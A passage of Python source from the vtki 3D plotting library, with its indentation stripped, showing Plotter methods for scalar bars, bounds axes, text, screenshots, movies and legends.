The new range of scalar bar. Example: ``[-1, 2]``.
name : str, optional
The title of the scalar bar to update
"""
if isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if len(clim) != 2:
raise TypeError('clim argument must be a length 2 iterable of values: (min, max).')
if name is None:
if not hasattr(self, 'mapper'):
raise RuntimeError('This plotter does not have an active mapper.')
return self.mapper.SetScalarRange(*clim)
# Use the name to find the desired actor
def update_mapper(mapper):
return mapper.SetScalarRange(*clim)
try:
for m in self._scalar_bar_mappers[name]:
update_mapper(m)
except KeyError:
raise KeyError('Name ({}) not valid/not found in this plotter.')
return
@property
def camera_set(self):
""" Returns if the camera of the active renderer has been set """
return self.renderer.camera_set
def get_default_cam_pos(self):
""" Return the default camera position of the active renderer """
return self.renderer.get_default_cam_pos()
@camera_set.setter
def camera_set(self, is_set):
""" Sets if the camera has been set on the active renderer"""
self.renderer.camera_set = is_set
@property
def renderer(self):
""" simply returns the active renderer """
return self.renderers[self._active_renderer_index]
@property
def bounds(self):
""" Returns the bounds of the active renderer """
return self.renderer.bounds
@property
def center(self):
""" Returns the center of the active renderer """
return self.renderer.center
def update_bounds_axes(self):
""" Update the bounds of the active renderer """
return self.renderer.update_bounds_axes()
def clear(self):
""" Clears plot by removing all actors and properties """
for renderer in self.renderers:
renderer.RemoveAllViewProps()
self._scalar_bar_slots = set(range(MAX_N_COLOR_BARS))
self._scalar_bar_slot_lookup = {}
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
self._scalar_bar_actors = {}
self._scalar_bar_widgets = {}
def remove_actor(self, actor, reset_camera=False):
"""
Removes an actor from the Plotter.
Parameters
----------
actor : vtk.vtkActor
Actor that has previously added to the Renderer.
reset_camera : bool, optional
Resets camera so all actors can be seen.
Returns
-------
success : bool
True when actor removed. False when actor has not been
removed.
"""
for renderer in self.renderers:
renderer.remove_actor(actor, reset_camera)
return True
def add_actor(self, uinput, reset_camera=False, name=None, loc=None,
culling=False):
"""
Adds an actor to render window. Creates an actor if input is
a mapper.
Parameters
----------
uinput : vtk.vtkMapper or vtk.vtkActor
vtk mapper or vtk actor to be added.
reset_camera : bool, optional
Resets the camera when true.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
culling : bool optional
Does not render faces that should not be visible to the
plotter. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Default False.
Returns
-------
actor : vtk.vtkActor
The actor.
actor_properties : vtk.Properties
Actor properties.
"""
# add actor to the correct render window
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
return renderer.add_actor(uinput, reset_camera, name, culling)
def loc_to_index(self, loc):
"""
Return index of the render window given a location index.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``.
Returns
-------
idx : int
Index of the render window.
"""
if loc is None:
return self._active_renderer_index
elif isinstance(loc, int):
return loc
elif isinstance(loc, collections.Iterable):
assert len(loc) == 2, '"loc" must contain two items'
return loc[0]*self.shape[0] + loc[1]
def index_to_loc(self, index):
"""Convert a 1D index location to the 2D location on the plotting grid
"""
sz = int(self.shape[0] * self.shape[1])
idxs = np.array([i for i in range(sz)], dtype=int).reshape(self.shape)
args = np.argwhere(idxs == index)
if len(args) < 1:
raise RuntimeError('Index ({}) is out of range.')
return args[0]
@property
def camera(self):
""" The active camera of the active renderer """
return self.renderer.camera
def add_axes_at_origin(self, loc=None):
"""
Add axes actor at the origin of a render window.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. When None, defaults to the
active render window.
Returns
--------
marker_actor : vtk.vtkAxesActor
vtkAxesActor actor
"""
self._active_renderer_index = self.loc_to_index(loc)
return self.renderers[self._active_renderer_index].add_axes_at_origin()
def show_bounds(self, mesh=None, bounds=None, show_xaxis=True,
show_yaxis=True, show_zaxis=True, show_xlabels=True,
show_ylabels=True, show_zlabels=True, italic=False,
bold=True, shadow=False, font_size=None,
font_family=None, color=None,
xlabel='X Axis', ylabel='Y Axis', zlabel='Z Axis',
use_2d=False, grid=None, location='closest', ticks=None,
all_edges=False, corner_factor=0.5, fmt=None,
minor_ticks=False, loc=None, padding=0.0):
"""
Adds bounds axes. Shows the bounds of the most recent input
mesh unless mesh is specified.
Parameters
----------
mesh : vtkPolydata or unstructured grid, optional
Input mesh to draw bounds axes around
bounds : list or tuple, optional
Bounds to override mesh bounds.
[xmin, xmax, ymin, ymax, zmin, zmax]
show_xaxis : bool, optional
Makes x axis visible. Default True.
show_yaxis : bool, optional
Makes y axis visible. Default True.
show_zaxis : bool, optional
Makes z axis visible. Default True.
show_xlabels : bool, optional
Shows x labels. Default True.
show_ylabels : bool, optional
Shows y labels. Default True.
show_zlabels : bool, optional
Shows z labels. Default True.
italic : bool, optional
Italicises axis labels and numbers. Default False.
bold : bool, optional
Bolds axis labels and numbers. Default True.
shadow : bool, optional
Adds a black shadow to the text. Default False.
font_size : float, optional
Sets the size of the label font. Defaults to 16.
font_family : string, optional
Font family. Must be either courier, times, or arial.
color : string or 3 item list, optional
Color of all labels and axis titles. Default white.
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
xlabel : string, optional
Title of the x axis. Default "X Axis"
ylabel : string, optional
Title of the y axis. Default "Y Axis"
zlabel : string, optional
Title of the z axis. Default "Z Axis"
use_2d : bool, optional
A bug with vtk 6.3 in Windows seems to cause this function
to crash this can be enabled for smoother plotting for
other enviornments.
grid : bool or str, optional
Add grid lines to the backface (``True``, ``'back'``, or
``'backface'``) or to the frontface (``'front'``,
``'frontface'``) of the axes actor.
location : str, optional
Set how the axes are drawn: either static (``'all'``),
closest triad (``front``), furthest triad (``'back'``),
static closest to the origin (``'origin'``), or outer
edges (``'outer'``) in relation to the camera
position. Options include: ``'all', 'front', 'back',
'origin', 'outer'``
ticks : str, optional
Set how the ticks are drawn on the axes grid. Options include:
``'inside', 'outside', 'both'``
all_edges : bool, optional
Adds an unlabeled and unticked box at the boundaries of
plot. Useful for when wanting to plot outer grids while
still retaining all edges of the boundary.
corner_factor : float, optional
If ``all_edges````, this is the factor along each axis to
draw the default box. Dafuault is 0.5 to show the full box.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
padding : float, optional
An optional percent padding along each axial direction to cushion
the datasets in the scene from the axes annotations. Defaults to
have no padding
Returns
-------
cube_axes_actor : vtk.vtkCubeAxesActor
Bounds actor
Examples
--------
>>> import vtki
>>> from vtki import examples
>>> mesh = vtki.Sphere()
>>> plotter = vtki.Plotter()
>>> _ = plotter.add_mesh(mesh)
>>> _ = plotter.show_bounds(grid='front', location='outer', all_edges=True)
>>> plotter.show() # doctest:+SKIP
"""
kwargs = locals()
_ = kwargs.pop('self')
_ = kwargs.pop('loc')
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
renderer.show_bounds(**kwargs)
def add_bounds_axes(self, *args, **kwargs):
"""Deprecated"""
logging.warning('`add_bounds_axes` is deprecated. Use `show_bounds` or `show_grid`.')
return self.show_bounds(*args, **kwargs)
def add_bounding_box(self, color=None, corner_factor=0.5, line_width=None,
opacity=1.0, render_lines_as_tubes=False, lighting=None,
reset_camera=None, loc=None):
"""
Adds an unlabeled and unticked box at the boundaries of
plot. Useful for when wanting to plot outer grids while
still retaining all edges of the boundary.
Parameters
----------
corner_factor : float, optional
If ``all_edges``, this is the factor along each axis to
draw the default box. Dafuault is 0.5 to show the full
box.
corner_factor : float, optional
This is the factor along each axis to draw the default
box. Dafuault is 0.5 to show the full box.
line_width : float, optional
Thickness of lines.
opacity : float, optional
Opacity of mesh. Should be between 0 and 1. Default 1.0
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
"""
kwargs = locals()
_ = kwargs.pop('self')
_ = kwargs.pop('loc')
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
return renderer.add_bounding_box(**kwargs)
def remove_bounding_box(self, loc=None):
"""
Removes bounding box from the active renderer.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
"""
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
renderer.remove_bounding_box()
def remove_bounds_axes(self, loc=None):
"""
Removes bounds axes from the active renderer.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
"""
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
renderer.remove_bounds_axes()
def subplot(self, index_x, index_y):
"""
Sets the active subplot.
Parameters
----------
index_x : int
Index of the subplot to activate in the x direction.
index_y : int
Index of the subplot to activate in the y direction.
"""
self._active_renderer_index = self.loc_to_index((index_x, index_y))
def show_grid(self, **kwargs):
"""
A wrapped implementation of ``show_bounds`` to change default
behaviour to use gridlines and showing the axes labels on the outer
edges. This is intended to be silimar to ``matplotlib``'s ``grid``
function.
"""
kwargs.setdefault('grid', 'back')
kwargs.setdefault('location', 'outer')
kwargs.setdefault('ticks', 'both')
return self.show_bounds(**kwargs)
def set_scale(self, xscale=None, yscale=None, zscale=None, reset_camera=True):
"""
Scale all the datasets in the scene of the active renderer.
Scaling in performed independently on the X, Y and Z axis.
A scale of zero is illegal and will be replaced with one.
Parameters
----------
xscale : float, optional
Scaling of the x axis. Must be greater than zero.
yscale : float, optional
Scaling of the y axis. Must be greater than zero.
zscale : float, optional
Scaling of the z axis. Must be greater than zero.
reset_camera : bool, optional
Resets camera so all actors can be seen.
"""
self.renderer.set_scale(xscale, yscale, zscale, reset_camera)
@property
def scale(self):
""" The scaling of the active renderer. """
return self.renderer.scale
def _update_axes_color(self, color):
"""Internal helper to set the axes label color"""
prop_x = self.axes_actor.GetXAxisCaptionActor2D().GetCaptionTextProperty()
prop_y = self.axes_actor.GetYAxisCaptionActor2D().GetCaptionTextProperty()
prop_z = self.axes_actor.GetZAxisCaptionActor2D().GetCaptionTextProperty()
if color is None:
color = rcParams['font']['color']
color = parse_color(color)
for prop in [prop_x, prop_y, prop_z]:
prop.SetColor(color[0], color[1], color[2])
prop.SetShadow(False)
return
def add_scalar_bar(self, title=None, n_labels=5, italic=False,
bold=True, title_font_size=None,
label_font_size=None, color=None,
font_family=None, shadow=False, mapper=None,
width=None, height=None, position_x=None,
position_y=None, vertical=None,
interactive=False, fmt=None, use_opacity=True,
outline=False):
"""
Creates scalar bar using the ranges as set by the last input
mesh.
Parameters
----------
title : string, optional
Title of the scalar bar. Default None
n_labels : int, optional
Number of labels to use for the scalar bar.
italic : bool, optional
Italicises title and bar labels. Default False.
bold : bool, optional
Bolds title and bar labels. Default True
title_font_size : float, optional
Sets the size of the title font. Defaults to None and is sized
automatically.
label_font_size : float, optional
Sets the size of the title font. Defaults to None and is sized
automatically.
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
font_family : string, optional
Font family. Must be either courier, times, or arial.
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
width : float, optional
The percentage (0 to 1) width of the window for the colorbar
height : float, optional
The percentage (0 to 1) height of the window for the colorbar
position_x : float, optional
The percentage (0 to 1) along the windows's horizontal
direction to place the bottom left corner of the colorbar
position_y : float, optional
The percentage (0 to 1) along the windows's vertical
direction to place the bottom left corner of the colorbar
interactive : bool, optional
Use a widget to control the size and location of the scalar bar.
use_opacity : bool, optional
Optionally disply the opacity mapping on the scalar bar
outline : bool, optional
Optionally outline the scalar bar to make opacity mappings more
obvious.
Notes
-----
Setting title_font_size, or label_font_size disables automatic font
sizing for both the title and label.
"""
if font_family is None:
font_family = rcParams['font']['family']
if label_font_size is None:
label_font_size = rcParams['font']['label_size']
if title_font_size is None:
title_font_size = rcParams['font']['title_size']
if color is None:
color = rcParams['font']['color']
if fmt is None:
fmt = rcParams['font']['fmt']
if vertical is None:
if rcParams['colorbar_orientation'].lower() == 'vertical':
vertical = True
# Automatically choose size if not specified
if width is None:
if vertical:
width = rcParams['colorbar_vertical']['width']
else:
width = rcParams['colorbar_horizontal']['width']
if height is None:
if vertical:
height = rcParams['colorbar_vertical']['height']
else:
height = rcParams['colorbar_horizontal']['height']
# check if maper exists
if mapper is None:
if not hasattr(self, 'mapper'):
raise Exception('Mapper does not exist. ' +
'Add a mesh with scalars first.')
mapper = self.mapper
if title:
# Check that this data hasn't already been plotted
if title in list(self._scalar_bar_ranges.keys()):
rng = list(self._scalar_bar_ranges[title])
newrng = mapper.GetScalarRange()
oldmappers = self._scalar_bar_mappers[title]
# get max for range and reset everything
if newrng[0] < rng[0]:
rng[0] = newrng[0]
if newrng[1] > rng[1]:
rng[1] = newrng[1]
for m in oldmappers:
m.SetScalarRange(rng[0], rng[1])
mapper.SetScalarRange(rng[0], rng[1])
self._scalar_bar_mappers[title].append(mapper)
self._scalar_bar_ranges[title] = rng
# Color bar already present and ready to be used so returning
return
# Automatically choose location if not specified
if position_x is None or position_y is None:
try:
slot = min(self._scalar_bar_slots)
self._scalar_bar_slots.remove(slot)
self._scalar_bar_slot_lookup[title] = slot
except:
raise RuntimeError('Maximum number of color bars reached.')
if position_x is None:
if vertical:
position_x = rcParams['colorbar_vertical']['position_x']
position_x -= slot * width
else:
position_x = rcParams['colorbar_horizontal']['position_x']
if position_y is None:
if vertical:
position_y = rcParams['colorbar_vertical']['position_y']
else:
position_y = rcParams['colorbar_horizontal']['position_y']
position_y += slot * height
# Adjust to make sure on the screen
if position_x + width > 1:
position_x -= width
if position_y + height > 1:
position_y -= height
# parse color
color = parse_color(color)
# Create scalar bar
self.scalar_bar = vtk.vtkScalarBarActor()
self.scalar_bar.SetLookupTable(mapper.GetLookupTable())
self.scalar_bar.SetNumberOfLabels(n_labels)
# edit the size of the colorbar
self.scalar_bar.SetHeight(height)
self.scalar_bar.SetWidth(width)
self.scalar_bar.SetPosition(position_x, position_y)
if fmt is not None:
self.scalar_bar.SetLabelFormat(fmt)
if vertical:
self.scalar_bar.SetOrientationToVertical()
else:
self.scalar_bar.SetOrientationToHorizontal()
if label_font_size is None or title_font_size is None:
self.scalar_bar.UnconstrainedFontSizeOn()
if n_labels:
label_text = self.scalar_bar.GetLabelTextProperty()
label_text.SetColor(color)
label_text.SetShadow(shadow)
# Set font
label_text.SetFontFamily(parse_font_family(font_family))
label_text.SetItalic(italic)
label_text.SetBold(bold)
if label_font_size:
label_text.SetFontSize(label_font_size)
# Set properties
if title:
rng = mapper.GetScalarRange()
self._scalar_bar_ranges[title] = rng
self._scalar_bar_mappers[title] = [mapper]
self.scalar_bar.SetTitle(title)
title_text = self.scalar_bar.GetTitleTextProperty()
title_text.SetJustificationToCentered()
title_text.SetItalic(italic)
title_text.SetBold(bold)
title_text.SetShadow(shadow)
if title_font_size:
title_text.SetFontSize(title_font_size)
# Set font
title_text.SetFontFamily(parse_font_family(font_family))
# set color
title_text.SetColor(color)
self._scalar_bar_actors[title] = self.scalar_bar
if interactive is None:
interactive = rcParams['interactive']
if shape != (1, 1):
interactive = False
elif interactive and self.shape != (1, 1):
err_str = 'Interactive scalar bars disabled for multi-renderer plots'
raise Exception(err_str)
if interactive and hasattr(self, 'iren'):
self.scalar_widget = vtk.vtkScalarBarWidget()
self.scalar_widget.SetScalarBarActor(self.scalar_bar)
self.scalar_widget.SetInteractor(self.iren)
self.scalar_widget.SetEnabled(1)
rep = self.scalar_widget.GetRepresentation()
# self.scalar_widget.On()
if vertical is True or vertical is None:
rep.SetOrientation(1) # 0 = Horizontal, 1 = Vertical
else:
rep.SetOrientation(0) # 0 = Horizontal, 1 = Vertical
self._scalar_bar_widgets[title] = self.scalar_widget
if use_opacity:
self.scalar_bar.SetUseOpacity(True)
if outline:
self.scalar_bar.SetDrawFrame(True)
frame_prop = self.scalar_bar.GetFrameProperty()
frame_prop.SetColor(color)
else:
self.scalar_bar.SetDrawFrame(False)
self.add_actor(self.scalar_bar, reset_camera=False)
def update_scalars(self, scalars, mesh=None, render=True):
"""
Updates scalars of the an object in the plotter.
Parameters
----------
scalars : np.ndarray
Scalars to replace existing scalars.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Forces an update to the render window. Default True.
"""
if mesh is None:
mesh = self.mesh
if isinstance(mesh, (collections.Iterable, vtki.MultiBlock)):
# Recursive if need to update scalars on many meshes
for m in mesh:
self.update_scalars(scalars, mesh=m, render=False)
if render:
self.ren_win.Render()
return
if isinstance(scalars, str):
# Grab scalar array if name given
scalars = get_scalar(mesh, scalars)
if scalars is None:
if render:
self.ren_win.Render()
return
if scalars.shape[0] == mesh.GetNumberOfPoints():
data = mesh.GetPointData()
elif scalars.shape[0] == mesh.GetNumberOfCells():
data = mesh.GetCellData()
else:
_raise_not_matching(scalars, mesh)
vtk_scalars = data.GetScalars()
if vtk_scalars is None:
raise Exception('No active scalars')
s = VN.vtk_to_numpy(vtk_scalars)
s[:] = scalars
data.Modified()
try:
# Why are the points updated here? Not all datasets have points
# and only the scalar array is modified by this function...
mesh.GetPoints().Modified()
except:
pass
if render:
self.ren_win.Render()
def update_coordinates(self, points, mesh=None, render=True):
"""
Updates the points of the an object in the plotter.
Parameters
----------
points : np.ndarray
Points to replace existing points.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Forces an update to the render window. Default True.
"""
if mesh is None:
mesh = self.mesh
mesh.points = points
if render:
self._render()
def close(self):
""" closes render window """
# must close out axes marker
if hasattr(self, 'axes_widget'):
del self.axes_widget
# reset scalar bar stuff
self._scalar_bar_slots = set(range(MAX_N_COLOR_BARS))
self._scalar_bar_slot_lookup = {}
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
if hasattr(self, 'ren_win'):
self.ren_win.Finalize()
del self.ren_win
if hasattr(self, '_style'):
del self._style
if hasattr(self, 'iren'):
self.iren.RemoveAllObservers()
del self.iren
if hasattr(self, 'textActor'):
del self.textActor
# end movie
if hasattr(self, 'mwriter'):
try:
self.mwriter.close()
except BaseException:
pass
def add_text(self, text, position=None, font_size=50, color=None,
font=None, shadow=False, name=None, loc=None):
"""
Adds text to plot object in the top left corner by default
Parameters
----------
text : str
The text to add the the rendering
position : tuple(float)
Length 2 tuple of the pixelwise position to place the bottom
left corner of the text box. Default is to find the top left corner
of the renderering window and place text box up there.
font : string, optional
Font name may be courier, times, or arial
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``.
Returns
-------
textActor : vtk.vtkTextActor
Text actor added to plot
"""
if font is None:
font = rcParams['font']['family']
if font_size is None:
font_size = rcParams['font']['size']
if color is None:
color = rcParams['font']['color']
if position is None:
# Set the position of the text to the top left corner
window_size = self.window_size
x = (window_size[0] * 0.02) / self.shape[0]
y = (window_size[1] * 0.90) / self.shape[0]
position = [x, y]
self.textActor = vtk.vtkTextActor()
self.textActor.SetPosition(position)
self.textActor.GetTextProperty().SetFontSize(font_size)
self.textActor.GetTextProperty().SetColor(parse_color(color))
self.textActor.GetTextProperty().SetFontFamily(FONT_KEYS[font])
self.textActor.GetTextProperty().SetShadow(shadow)
self.textActor.SetInput(text)
self.add_actor(self.textActor, reset_camera=False, name=name, loc=loc)
return self.textActor
def open_movie(self, filename, framerate=24):
"""
Establishes a connection to the ffmpeg writer
Parameters
----------
filename : str
Filename of the movie to open. Filename should end in mp4,
but other filetypes may be supported. See "imagio.get_writer"
framerate : int, optional
Frames per second.
"""
if isinstance(vtki.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(vtki.FIGURE_PATH, filename)
self.mwriter = imageio.get_writer(filename, fps=framerate)
def open_gif(self, filename):
"""
Open a gif file.
Parameters
----------
filename : str
Filename of the gif to open. Filename must end in gif.
"""
if filename[-3:] != 'gif':
raise Exception('Unsupported filetype. Must end in .gif')
if isinstance(vtki.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(vtki.FIGURE_PATH, filename)
self._gif_filename = os.path.abspath(filename)
self.mwriter = imageio.get_writer(filename, mode='I')
def write_frame(self):
""" Writes a single frame to the movie file """
if not hasattr(self, 'mwriter'):
raise AssertionError('This plotter has not opened a movie or GIF file.')
self.mwriter.append_data(self.image)
@property
def window_size(self):
""" returns render window size """
return list(self.ren_win.GetSize())
@window_size.setter
def window_size(self, window_size):
""" set the render window size """
self.ren_win.SetSize(window_size[0], window_size[1])
def _run_image_filter(self, ifilter):
# Update filter and grab pixels
ifilter.Modified()
ifilter.Update()
image = vtki.wrap(ifilter.GetOutput())
img_size = image.dimensions
img_array = vtki.utilities.point_scalar(image, 'ImageScalars')
# Reshape and write
tgt_size = (img_size[1], img_size[0], -1)
return img_array.reshape(tgt_size)[::-1]
@property
def image_depth(self):
""" Returns an image array of current render window """
ifilter = vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
ifilter.SetInputBufferTypeToZBuffer()
return self._run_image_filter(ifilter)
@property
def image(self):
""" Returns an image array of current render window """
if not hasattr(self, 'ren_win') and hasattr(self, 'last_image'):
return self.last_image
ifilter = vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
if self.image_transparent_background:
ifilter.SetInputBufferTypeToRGBA()
else:
ifilter.SetInputBufferTypeToRGB()
return self._run_image_filter(ifilter)
def enable_eye_dome_lighting(self):
"""Enable eye dome lighting (EDL) for active renderer"""
return self.renderer.enable_eye_dome_lighting()
def disable_eye_dome_lighting(self):
"""Disable eye dome lighting (EDL) for active renderer"""
return self.renderer.disable_eye_dome_lighting()
def add_lines(self, lines, color=(1, 1, 1), width=5, label=None, name=None):
"""
Adds lines to the plotting object.
Parameters
----------
lines : np.ndarray or vtki.PolyData
Points representing line segments. For example, two line segments
would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
width : float, optional
Thickness of lines
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Returns
-------
actor : vtk.vtkActor
Lines actor.
"""
if not isinstance(lines, np.ndarray):
raise Exception('Input should be an array of point segments')
lines = vtki.lines_from_points(lines)
# Create mapper and add lines
mapper = vtk.vtkDataSetMapper()
mapper.SetInputData(lines)
rgb_color = parse_color(color)
# legend label
if label:
if not isinstance(label, str):
raise AssertionError('Label must be a string')
self._labels.append([lines, label, rgb_color])
# Create actor
self.scalar_bar = vtk.vtkActor()
self.scalar_bar.SetMapper(mapper)
self.scalar_bar.GetProperty().SetLineWidth(width)
self.scalar_bar.GetProperty().EdgeVisibilityOn()
self.scalar_bar.GetProperty().SetEdgeColor(rgb_color)
self.scalar_bar.GetProperty().SetColor(rgb_color)
self.scalar_bar.GetProperty().LightingOff()
# Add to renderer
self.add_actor(self.scalar_bar, reset_camera=False, name=name)
return self.scalar_bar
def remove_scalar_bar(self):
""" Removes scalar bar """
if hasattr(self, 'scalar_bar'):
self.remove_actor(self.scalar_bar, reset_camera=False)
def add_point_labels(self, points, labels, italic=False, bold=True,
font_size=None, text_color='k',
font_family=None, shadow=False,
show_points=True, point_color='k', point_size=5,
name=None):
"""
Creates a point actor with one label from list labels assigned to
each point.
Parameters
----------
points : np.ndarray
n x 3 numpy array of points.
labels : list
List of labels. Must be the same length as points.
italic : bool, optional
Italicises title and bar labels. Default False.
bold : bool, optional
Bolds title and bar labels. Default True
font_size : float, optional
Sets the size of the title font. Defaults to 16.
text_color : string or 3 item list, optional, defaults to black
Color of text.
Either a string, rgb list, or hex color string. For example:
text_color='white'
text_color='w'
text_color=[1, 1, 1]
text_color='#FFFFFF'
font_family : string, optional
Font family. Must be either courier, times, or arial.
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
show_points : bool, optional
Controls if points are visible. Default True
point_color : string or 3 item list, optional, defaults to black
Color of points (if visible).
Either a string, rgb list, or hex color string. For example:
text_color='white'
text_color='w'
text_color=[1, 1, 1]
text_color='#FFFFFF'
point_size : float, optional
Size of points (if visible)
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Returns
-------
labelMapper : vtk.vtkvtkLabeledDataMapper
VTK label mapper. Can be used to change properties of the labels.
"""
if font_family is None:
font_family = rcParams['font']['family']
if font_size is None:
font_size = rcParams['font']['size']
if len(points) != len(labels):
raise Exception('There must be one label for each point')
vtkpoints = vtki.PolyData(points)
vtklabels = vtk.vtkStringArray()
vtklabels.SetName('labels')
for item in labels:
vtklabels.InsertNextValue(str(item))
vtkpoints.GetPointData().AddArray(vtklabels)
# create label mapper
labelMapper = vtk.vtkLabeledDataMapper()
labelMapper.SetInputData(vtkpoints)
textprop = labelMapper.GetLabelTextProperty()
textprop.SetItalic(italic)
textprop.SetBold(bold)
textprop.SetFontSize(font_size)
textprop.SetFontFamily(parse_font_family(font_family))
textprop.SetColor(parse_color(text_color))
textprop.SetShadow(shadow)
labelMapper.SetLabelModeToLabelFieldData()
labelMapper.SetFieldDataName('labels')
labelActor = vtk.vtkActor2D()
labelActor.SetMapper(labelMapper)
# add points
if show_points:
style = 'points'
else:
style = 'surface'
self.add_mesh(vtkpoints, style=style, color=point_color,
point_size=point_size)
self.add_actor(labelActor, reset_camera=False, name=name)
return labelMapper
def add_points(self, points, **kwargs):
""" Add points to a mesh """
kwargs['style'] = 'points'
self.add_mesh(points, **kwargs)
def add_arrows(self, cent, direction, mag=1, **kwargs):
""" Adds arrows to plotting object """
direction = direction.copy()
if cent.ndim != 2:
cent = cent.reshape((-1, 3))
if direction.ndim != 2:
direction = direction.reshape((-1, 3))
direction[:,0] *= mag
direction[:,1] *= mag
direction[:,2] *= mag
pdata = vtki.vector_poly_data(cent, direction)
# Create arrow object
arrow = vtk.vtkArrowSource()
arrow.Update()
glyph3D = vtk.vtkGlyph3D()
glyph3D.SetSourceData(arrow.GetOutput())
glyph3D.SetInputData(pdata)
glyph3D.SetVectorModeToUseVector()
glyph3D.Update()
arrows = wrap(glyph3D.GetOutput())
return self.add_mesh(arrows, **kwargs)
@staticmethod
def _save_image(image, filename, return_img=None):
"""Internal helper for saving a NumPy image array"""
if not image.size:
raise Exception('Empty image. Have you run plot() first?')
# write screenshot to file
if isinstance(filename, str):
if isinstance(vtki.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(vtki.FIGURE_PATH, filename)
if not return_img:
return imageio.imwrite(filename, image)
imageio.imwrite(filename, image)
return image
def screenshot(self, filename=None, transparent_background=False,
return_img=None, window_size=None):
"""
Takes screenshot at current camera position
Parameters
----------
filename : str, optional
Location to write image to. If None, no image is written.
transparent_background : bool, optional
Makes the background transparent. Default False.
return_img : bool, optional
If a string filename is given and this is true, a NumPy array of
the image will be returned.
Returns
-------
img : numpy.ndarray
Array containing pixel RGB and alpha. Sized:
[Window height x Window width x 3] for transparent_background=False
[Window height x Window width x 4] for transparent_background=True
Examples
--------
>>> import vtki
>>> sphere = vtki.Sphere()
>>> plotter = vtki.Plotter()
>>> actor = plotter.add_mesh(sphere)
>>> plotter.screenshot('screenshot.png') # doctest:+SKIP
"""
if window_size is not None:
self.window_size = window_size
# configure image filter
self.image_transparent_background = transparent_background
# This if statement allows you to save screenshots of closed plotters
# This is needed for the sphinx-gallery work
if not hasattr(self, 'ren_win'):
# If plotter has been closed...
# check if last_image exists
if hasattr(self, 'last_image'):
# Save last image
return self._save_image(self.last_image, filename, return_img)
# Plotter hasn't been rendered or was improperly closed
raise AttributeError('This plotter is unable to save a screenshot.')
if isinstance(self, Plotter):
# TODO: we need a consistent rendering function
self.render()
else:
self._render()
# debug: this needs to be called twice for some reason,
img = self.image
img = self.image
return self._save_image(img, filename, return_img)
def add_legend(self, labels=None, bcolor=(0.5, 0.5, 0.5), border=False,
size=None, name=None):
"""
Adds a legend to render window. Entries must be a list
containing one string and color entry for each item.
Parameters
----------
labels : list, optional
When set to None, uses existing labels as specified by
- add_mesh
- add_lines
- add_points
List contianing one entry for each item to be added to the
legend. Each entry must contain two strings, [label,
color], where label is the name of the item to add, and
color is the color of the label to add.
bcolor : list or string, optional
Background color, either a three item 0 to 1 RGB color
list, or a matplotlib color string (e.g. 'w' or 'white'
for a white color). If None, legend background is
disabled.
border : bool, optional
Controls if there will be a border around the legend.
Default False.
size : list, optional
Two float list, each float between 0 and 1. For example
[0.1, 0.1] would make the legend 10% the size of the
entire figure window.
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Returns
-------
legend : vtk.vtkLegendBoxActor
Actor for the legend.
Examples
--------
>>> import vtki
>>> from vtki import examples
>>> mesh = examples.load_hexbeam()
>>> othermesh = examples.load_uniform()
>>> plotter = vtki.Plotter()
>>> _ = plotter.add_mesh(mesh, label='My Mesh')
>>> _ = plotter.add_mesh(othermesh, 'k', label='My Other Mesh')
>>> _ = plotter.add_legend()
>>> plotter.show() # doctest:+SKIP
Alternative manual example
>>> import vtki
